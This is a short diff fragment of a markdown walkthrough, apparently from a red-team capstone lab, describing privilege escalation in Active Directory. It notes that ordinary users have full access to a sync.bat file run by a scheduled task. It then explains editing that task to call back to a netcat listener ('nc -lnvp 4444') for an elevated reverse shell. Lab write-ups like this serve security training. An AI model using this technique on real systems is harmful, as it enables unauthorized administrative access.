kairosart/Red-Team-Capstone-Challenge/INITIAL ACTIVE DIRECTORY ACCESS/CORP Tier 1.md

 BUILTIN\Administrators:(I)(F)
 BUILTIN\Users:(I)(RX)

 > - Full access on the sync.bat file.

 ## Set up a listener with the previously found netcat

+With this information, we know that we can set up a listener with the previously found netcat executable, and edit the task to connect with the same executable with administrative privileges, receiving an elevated reverse shell:
 ```
 nc -lnvp 4444
 ```